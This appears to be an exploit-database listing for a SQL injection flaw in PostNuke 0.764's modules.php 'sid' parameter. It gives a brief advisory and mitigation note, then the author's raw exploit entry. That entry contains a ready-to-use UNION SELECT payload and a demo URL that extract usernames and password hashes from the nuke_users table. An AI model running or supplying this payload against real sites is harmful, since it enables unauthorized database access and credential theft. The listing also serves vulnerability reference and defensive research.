header-logo
Suggest Exploit
vendor:
PostNuke
by:
BILGE_KAGAN
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PostNuke
Affected Version From: 0.764
Affected Version To: 0.764
Patch Exists: YES
Related CWE: N/A
CPE: a:postnuke:postnuke
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

PostNuke 0.764 Module modload SQL Injection Vulnerability

PostNuke 0.764 is vulnerable to a SQL injection vulnerability in the 'modules.php' file. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the 'modules.php' file via the 'sid' parameter. This can allow an attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

PostNuke 0.764 Module modload SQL Injection Vulnerability

###########################  
      
Author    : BILGE_KAGAN
   
Homepage  : http://www.1923turk.com   
      
Script    : postnuke http://www.postnuke.com 
  
Download  : http://www.postnuke.com/module-Content-view-pid-2.html  
      
###########################    
        
[ Vulnerable File ]
  
    
modules.php?op=modload&name=News&file=article&sid=[ SQL ]  
         
    
[ XpL ] 
 
      
1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users-- 
  
[ Demo] 
 
  
http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--